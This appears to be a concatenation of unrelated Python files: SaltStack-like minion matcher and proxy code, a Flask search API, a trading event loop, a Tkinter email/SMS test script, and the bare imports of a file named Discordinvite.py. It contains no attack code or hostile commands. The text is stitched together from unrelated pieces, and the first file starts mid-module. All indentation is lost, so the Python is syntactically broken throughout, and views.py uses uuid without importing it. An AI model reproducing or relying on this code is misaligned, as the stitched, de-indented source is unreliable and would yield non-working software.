def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
tgt = ipaddress.ip_network(tgt)
# Target is a network
proto = 'ipv{0}'.format(tgt.version)
if proto not in self.opts['grains']:
return False
else:
return salt.utils.network.in_subnet(tgt, self.opts['grains'][proto])
except: # pylint: disable=bare-except
try:
# Target should be an address
proto = 'ipv{0}'.format(ipaddress.ip_address(tgt).version)
if proto not in self.opts['grains']:
return False
else:
return tgt in self.opts['grains'][proto]
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target {0}"'.format(tgt))
return False
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar']:
log.error('No proxy key found in pillar for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
fq_proxyname = self.opts['pillar']['proxy']['proxytype']
self.opts['proxy'] = self.opts['pillar']['proxy']
# We need to do this again, because we are going to throw out a lot of grains.
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['proxymodule'] = salt.loader.proxy(self.opts, None, loaded_base_name=fq_proxyname)
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
proxy_fn = self.opts['proxymodule'].loaded_base_name + '.init'
self.opts['proxymodule'][proxy_fn](self.opts)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
}, persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
|
views.py
|
from flask import request
from flask_cors import CORS, cross_origin
from datetime import datetime, timezone
from functools import wraps
import threading, json, time
from googletrans import Translator
from AuthModule.azuread import authProvider
from SearchModule import app
from SearchModule.TextSearchModule import loadModel, refreshModel, freeModel, loaded_models
from SearchModule.Utilities import resourceConfig, getProductId, getAllProductIds
from SearchModule.StorageAccountHelper import StorageAccountHelper
from SearchModule.Logger import loggerInstance
translator = Translator()
######## RUN THE API SERVER IN FLASK #############
def getUTCTime():
return datetime.now(timezone.utc)
def getLatency(startTime, endTime):
return (endTime-startTime).total_seconds()*1000
def getRequestId(req):
if req.method == 'POST':
data = json.loads(request.data.decode('utf-8'))
return data['requestId'] if 'requestId' in data else None
elif req.method == 'GET':
return request.args.get('requestId')
return None
def loggingProvider(requestIdRequired=True):
def loggingOuter(f):
@wraps(f)
def logger(*args, **kwargs):
startTime = getUTCTime()
res = None
try:
requestId = getRequestId(request)
except Exception as e:
exceptionMessage = "Failed to parse request to get requestId: {0}".format(str(e))
loggerInstance.logUnhandledException("ErrorRequestId", exceptionMessage)
return (exceptionMessage, 500)
requestId = requestId if requestId else (str(uuid.uuid4()) if not requestIdRequired else None)
if not requestId:
res = ("BadRequest: Missing parameter requestId", 400)
endTime = getUTCTime()
loggerInstance.logApiSummary("Null", str(request.url_rule), res[1], getLatency(startTime, endTime), startTime.strftime("%H:%M:%S.%f"), endTime.strftime("%H:%M:%S.%f"), res[0])
return res
else:
try:
res = f(*args, **kwargs)
except Exception as e:
res = (str(e), 500)
loggerInstance.logUnhandledException(requestId, str(e))
endTime = getUTCTime()
if res:
loggerInstance.logApiSummary(requestId, str(request.url_rule), res[1], getLatency(startTime, endTime), startTime.strftime("%H:%M:%S.%f"), endTime.strftime("%H:%M:%S.%f"), res[0])
return res
return logger
return loggingOuter
# App routes
cors = CORS(app)
app.config.from_object("AppConfig.ProductionConfig")
app.config['CORS_HEADERS'] = 'Content-Type'
@app.before_first_request
def activate_job():
if app.config['MODEL_SYNC_ENABLED']:
productIds = getAllProductIds(resourceConfig)
sah = StorageAccountHelper(loggerInstance)
loggerInstance.logInsights("Starting model sync for {0}".format(','.join(productIds)))
thread = threading.Thread(target=sah.watchModels, args=(productIds,))
thread.start()
while True:
modelDownloadPending = [sah.firstTime[productId] if productId in sah.firstTime else True for productId in productIds]
if any(modelDownloadPending):
time.sleep(2)
else:
break
loggerInstance.logInsights("Search service startup succeeded")
@app.route('/healthping')
@cross_origin()
def healthPing():
return ("I am alive!", 200)
@app.route('/queryDetectors', methods=["POST"])
@cross_origin()
@authProvider()
@loggingProvider(requestIdRequired=True)
def queryDetectorsMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txt_data = translator.translate(data['text']).text
if not txt_data:
return ("No text provided for search", 400)
productid = getProductId(data)
if not productid:
return ('Resource data not available', 404)
productid = productid[0]
try:
loadModel(productid)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
return (json.dumps({"query": txt_data, "results": [], "exception": str(e)}), 404)
results = loaded_models[productid].queryDetectors(txt_data)
res = json.dumps(results)
return (res, 200)
@app.route('/queryMultiple', methods=["POST"])
def queryMultipleMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txts = data['texts']
if not txts:
return ("No texts provided for search", 400)
productid = getProductId(data)
if not productid:
return ('Resource data not available', 404)
productid = productid[0]
try:
loadModel(productid)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
loggerInstance.logToFile(requestId, e)
return (json.dumps({"query": txts, "results": [], "exception": str(e)}), 404)
res = json.dumps([loaded_models[productid].queryDetectors(txt_data) for txt_data in txts])
return (res, 200)
@app.route('/queryUtterances', methods=["POST"])
@cross_origin()
@authProvider()
def queryUtterancesMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txt_data = data['detector_description']
existing_utterances = [str(x).lower() for x in json.loads(data['detector_utterances'])]
if not txt_data:
return ("No text provided for search", 400)
productid = getProductId(data)
if not productid:
return ('Resource type product data not available', 404)
results = {"query": txt_data, "results": []}
for product in productid:
try:
loadModel(product)
res = loaded_models[product].queryUtterances(txt_data, existing_utterances)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
res = {"query": txt_data, "results": None, "exception": str(e)}
if res:
results["results"] += res["results"] if res["results"] else []
res = json.dumps(results)
return (res, 200)
@app.route('/freeModel')
@cross_origin()
@authProvider()
def freeModelMethod():
productid = str(request.args.get('productId'))
freeModel(productid)
return ('', 204)
@app.route('/refreshModel', methods=["GET"])
@cross_origin()
@authProvider()
@loggingProvider(requestIdRequired=True)
def refreshModelMethod():
productid = str(request.args.get('productId')).strip()
res = "{0} - {1}".format(productid, refreshModel(productid))
return (res, 200)
|
control.py
|
from queue import PriorityQueue
from threading import Thread, Event
from peoples_advisor.event.event import ExitEvent, BaseEvent
from peoples_advisor.price.price import pricing_gen_factory
#from peoples_advisor.portfolio.portfolio import Portfolio
from peoples_advisor.signal.signal import SignalStrategy
from peoples_advisor.sizing.sizing import SizingStrategy
class Control:
def __init__(
self,
sig_strategy: SignalStrategy,
size_strategy: SizingStrategy,
backtesting=False,
):
self.run_flag = Event()
self.exit_flag = Event()
self.events = PriorityQueue()
self.backtesting = backtesting
self.pricing_stream = Thread(
target=pricing_gen_factory(self.events, self.exit_flag).gen,
daemon=True,
)
#self.portfolio = Portfolio()
self.sig_strategy = sig_strategy
self.size_strategy = size_strategy
if not self.backtesting:
self.pricing_stream.start()
def run(self):
while not self.exit_flag.is_set():
event = self.events.get(block=True)
# Event if else chain is ordered by the priority of their associated events
if event.type == "EXIT": # Exit the control program
self.exit_flag.set()
elif event.type == "START": # Start threads
self.run_flag.set()
elif event.type == "STOP":
self.run_flag.clear()
elif self.run_flag.is_set():
if event.type == "ORDER": # Pass order events to portfolio monitor maybe
pass
elif event.type == "SIGNAL": # Pass signal events to order gen
order_event = self.size_strategy.gen_order(event)
self.queue_event(order_event)
elif event.type == "PRICE": # Pass price events to signal gen
print(event)
#self.portfolio.update_price(event)
signal_event = self.sig_strategy.gen_signal(event)
self.queue_event(signal_event)
elif event.type == "QUOTE":
#self.portfolio.update_price(event)
pass
else:
pass
self.events.task_done()
def queue_event(self, event: BaseEvent = None):
if not self.exit_flag.is_set() and event is not None:
self.events.put(event)
|
test_program_for_EmailAndSMS_ReubenPython2and3Class_Generic.py
|
'''
Reuben Brewer, Ph.D.
reuben.brewer@gmail.com
www.reubotics.com
Apache 2 License
Software Revision C, 09/05/2021
Verified working on: Python 2.7 and 3 for Windows 8.1 64-bit and Raspberry Pi Buster (no Mac testing yet).
'''
__author__ = 'reuben.brewer'
from EmailAndSMS_ReubenPython2and3Class import *
from MyPrint_ReubenPython2and3Class import *
import os, sys, platform
import time, datetime
import threading
import collections
###############
if sys.version_info[0] < 3:
from Tkinter import * #Python 2
import tkFont
import ttk
else:
from tkinter import * #Python 3
import tkinter.font as tkFont #Python 3
from tkinter import ttk
###############
###############
if sys.version_info[0] < 3:
from builtins import raw_input as input
else:
from future.builtins import input as input #"sudo pip3 install future" (Python 3) AND "sudo pip install future" (Python 2)
###############
##########################################################################################################
##########################################################################################################
def getPreciseSecondsTimeStampString():
ts = time.time()
return ts
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TestButtonResponse():
global MyPrint_ReubenPython2and3ClassObject
global USE_MYPRINT_FLAG
if USE_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.my_print("Test Button was Pressed!")
else:
print("Test Button was Pressed!")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_update_clock():
global root
global EXIT_PROGRAM_FLAG
global GUI_RootAfterCallbackInterval_Milliseconds
global USE_GUI_FLAG
global EmailAndSMS_ReubenPython2and3ClassObject
global EmailAndSMS_OPEN_FLAG
global SHOW_IN_GUI_EmailAndSMS_FLAG
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
global SHOW_IN_GUI_MYPRINT_FLAG
if USE_GUI_FLAG == 1:
if EXIT_PROGRAM_FLAG == 0:
#########################################################
#########################################################
#########################################################
if EmailAndSMS_OPEN_FLAG == 1 and SHOW_IN_GUI_EmailAndSMS_FLAG == 1:
EmailAndSMS_ReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
#########################################################
if MYPRINT_OPEN_FLAG == 1 and SHOW_IN_GUI_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
#########################################################
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ExitProgram_Callback():
global root
global EXIT_PROGRAM_FLAG
global GUI_RootAfterCallbackInterval_Milliseconds
global EmailAndSMS_ReubenPython2and3ClassObject
global EmailAndSMS_OPEN_FLAG
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
print("Exiting all threads in test_program_for_MyPrint_ReubenPython2and3Class.")
EXIT_PROGRAM_FLAG = 1
#########################################################
if EmailAndSMS_OPEN_FLAG == 1:
EmailAndSMS_ReubenPython2and3ClassObject.ExitProgram_Callback()
#########################################################
#########################################################
if MYPRINT_OPEN_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.ExitProgram_Callback()
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_Thread():
global root
global GUI_RootAfterCallbackInterval_Milliseconds
################################################# KEY GUI LINE
#################################################
root = Tk()
#################################################
#################################################
#################################################
TestButton = Button(root, text='Test Button', state="normal", width=20, command=lambda i=1: TestButtonResponse())
TestButton.grid(row=0, column=0, padx=5, pady=1)
#################################################
#################################################
root.protocol("WM_DELETE_WINDOW", ExitProgram_Callback) # Set the callback function for when the window's closed.
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
root.mainloop()
#################################################
#################################################
root.quit() #Stop the GUI thread, MUST BE CALLED FROM GUI_Thread
root.destroy() #Close down the GUI thread, MUST BE CALLED FROM GUI_Thread
#################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
if __name__ == '__main__':
#################################################
#################################################
global my_platform
if platform.system() == "Linux":
if "raspberrypi" in platform.uname(): # os.uname() doesn't work in windows
my_platform = "pi"
else:
my_platform = "linux"
elif platform.system() == "Windows":
my_platform = "windows"
elif platform.system() == "Darwin":
my_platform = "mac"
else:
my_platform = "other"
print("The OS platform is: " + my_platform)
#################################################
#################################################
#################################################
#################################################
global USE_GUI_FLAG
USE_GUI_FLAG = 1
global USE_EmailAndSMS_FLAG
USE_EmailAndSMS_FLAG = 1
global USE_MYPRINT_FLAG
USE_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global SHOW_IN_GUI_EmailAndSMS_FLAG
SHOW_IN_GUI_EmailAndSMS_FLAG = 1
global SHOW_IN_GUI_MYPRINT_FLAG
SHOW_IN_GUI_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global GUI_ROW_EmailAndSMS
global GUI_COLUMN_EmailAndSMS
global GUI_PADX_EmailAndSMS
global GUI_PADY_EmailAndSMS
global GUI_ROWSPAN_EmailAndSMS
global GUI_COLUMNSPAN_EmailAndSMS
GUI_ROW_EmailAndSMS = 0
GUI_COLUMN_EmailAndSMS = 0
GUI_PADX_EmailAndSMS = 1
GUI_PADY_EmailAndSMS = 10
GUI_ROWSPAN_EmailAndSMS = 1
GUI_COLUMNSPAN_EmailAndSMS = 1
global GUI_ROW_MYPRINT
global GUI_COLUMN_MYPRINT
global GUI_PADX_MYPRINT
global GUI_PADY_MYPRINT
global GUI_ROWSPAN_MYPRINT
global GUI_COLUMNSPAN_MYPRINT
GUI_ROW_MYPRINT = 1
GUI_COLUMN_MYPRINT = 0
GUI_PADX_MYPRINT = 1
GUI_PADY_MYPRINT = 10
GUI_ROWSPAN_MYPRINT = 1
GUI_COLUMNSPAN_MYPRINT = 1
#################################################
#################################################
#################################################
#################################################
global EXIT_PROGRAM_FLAG
EXIT_PROGRAM_FLAG = 0
global root
global GUI_RootAfterCallbackInterval_Milliseconds
GUI_RootAfterCallbackInterval_Milliseconds = 30
global EmailAndSMS_ReubenPython2and3ClassObject
global EmailAndSMS_OPEN_FLAG
EmailAndSMS_OPEN_FLAG = -1
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
MYPRINT_OPEN_FLAG = -1
global MainLoopThread_current_time
MainLoopThread_current_time = -11111
global MainLoopThread_starting_time
MainLoopThread_starting_time = -11111
#################################################
#################################################
################################################# KEY GUI LINE
#################################################
if USE_GUI_FLAG == 1:
print("Starting GUI thread...")
GUI_Thread_ThreadingObject = threading.Thread(target=GUI_Thread)
GUI_Thread_ThreadingObject.setDaemon(True) #Should mean that the GUI thread is destroyed automatically when the main thread is destroyed.
GUI_Thread_ThreadingObject.start()
time.sleep(0.5) #Allow enough time for 'root' to be created that we can then pass it into other classes.
else:
root = None
#################################################
#################################################
#################################################
#################################################
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter = -11111.0
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds = -11111.0
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType = ""
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict = ""
EmailAndSMS_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_EmailAndSMS_FLAG),
("root", root),
("EnableInternal_MyPrint_Flag", 1),
("NumberOfPrintLines", 10),
("UseBorderAroundThisGuiObjectFlag", 1),
("GUI_ROW", GUI_ROW_EmailAndSMS),
("GUI_COLUMN", GUI_COLUMN_EmailAndSMS),
("GUI_PADX", GUI_PADX_EmailAndSMS),
("GUI_PADY", GUI_PADY_EmailAndSMS),
("GUI_ROWSPAN", GUI_ROWSPAN_EmailAndSMS),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_EmailAndSMS)])
EmailAndSMS_setup_dict = dict([("EmailSenderAccountUsername", "SenderEmailAddress@gmail.com"),
("EmailSenderAccountPassword", "password"),
("EmailAddress_RecipientList", ["RecipientEmailAddress@gmail.com"]),
("PhoneNumber_RecipientList", ["0123456789"]),
("GUIparametersDict", EmailAndSMS_GUIparametersDict),
("TxThread_TimeToSleepEachLoop", 0.020),
("EmailAndSMS_TxMessage_Queue_MaxSize", 1000),
("TestFilesFolderFullPath", os.getcwd() + "/TestEmailAndSMSfiles")])
if USE_EmailAndSMS_FLAG == 1:
try:
EmailAndSMS_ReubenPython2and3ClassObject = EmailAndSMS_ReubenPython2and3Class(EmailAndSMS_setup_dict)
time.sleep(0.25)
EmailAndSMS_OPEN_FLAG = EmailAndSMS_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("EmailAndSMS_ReubenPython2and3ClassObject, exceptions: %s" % exceptions, 0)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_MYPRINT_FLAG),
("root", root),
("UseBorderAroundThisGuiObjectFlag", 0),
("GUI_ROW", GUI_ROW_MYPRINT),
("GUI_COLUMN", GUI_COLUMN_MYPRINT),
("GUI_PADX", GUI_PADX_MYPRINT),
("GUI_PADY", GUI_PADY_MYPRINT),
("GUI_ROWSPAN", GUI_ROWSPAN_MYPRINT),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_MYPRINT)])
MyPrint_ReubenPython2and3ClassObject_setup_dict = dict([("NumberOfPrintLines", 10),
("WidthOfPrintingLabel", 200),
("PrintToConsoleFlag", 1),
("LogFileNameFullPath", os.getcwd() + "//TestLog.txt"),
("GUIparametersDict", MyPrint_ReubenPython2and3ClassObject_GUIparametersDict)])
try:
MyPrint_ReubenPython2and3ClassObject = MyPrint_ReubenPython2and3Class(MyPrint_ReubenPython2and3ClassObject_setup_dict)
time.sleep(0.25)
MYPRINT_OPEN_FLAG = MyPrint_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("MyPrint_ReubenPython2and3ClassObject __init__: Exceptions: %s" % exceptions, 0)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1 and MYPRINT_OPEN_FLAG != 1:
print("Failed to open MyPrint_ReubenPython2and3ClassObject.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
if USE_EmailAndSMS_FLAG == 1 and EmailAndSMS_OPEN_FLAG != 1:
print("Failed to open EmailAndSMS_ReubenPython2and3Class.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
print("Starting main loop 'test_program_for_EmailAndSMS_ReubenPython2and3ClassObject_Generic.")
MainLoopThread_starting_time = getPreciseSecondsTimeStampString()
EmailToSendDict = dict([("Subject", "EmailFromTheMainProgram"),
("Text", "BANANA"),
("TxtFileToAttachFullFilePath", os.getcwd() + "\TestEmailAndSMSfiles\TestTxtFile.txt"),
("ExcelOrBinaryFileToAttachFullFilePath", os.getcwd() + "\TestEmailAndSMSfiles\TestExcelFile.xlsx"),
("ImageFileToAttachFullFilePath", os.getcwd() + "\TestEmailAndSMSfiles\TestImage.jpg")])
'''
for i in range(0, 1):
print(EmailAndSMS_ReubenPython2and3ClassObject.AddEmailToBeSentToAllRecipients(EmailToSendDict))
time.sleep(0.25)
print(EmailAndSMS_ReubenPython2and3ClassObject.AddSMStoBeSentToAllRecipients(dict([("Subject", "SMSfromTheMainProgram"),("Text", "SPLIT")])))
time.sleep(0.25)
'''
while(EXIT_PROGRAM_FLAG == 0):
###################################################
MainLoopThread_current_time = getPreciseSecondsTimeStampString() - MainLoopThread_starting_time
###################################################
###################################################
if USE_EmailAndSMS_FLAG == 1:
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict = EmailAndSMS_ReubenPython2and3ClassObject.GetMostRecentTxMessageDict()
if "MessageType" in EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict:
if EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["MessageType"] != "NULL":
#print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict: " + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict))
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter = EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["TxMessageCounter"]
print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter" + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter))
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds = EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["TxMessageTimeSeconds"]
print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds" + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds))
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType = EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["MessageType"]
print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType" + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType))
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict = EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["MessageContentsDict"]
print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict" + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict))
###################################################
time.sleep(0.25)
#################################################
#################################################
print("Exiting main program 'test_program_for_EmailAndSMS_ReubenPython2and3ClassObject_Generic.")
##########################################################################################################
##########################################################################################################
|
Discordinvite.py
|
import requests, os, colorama, random, string, threading, json
from os import system
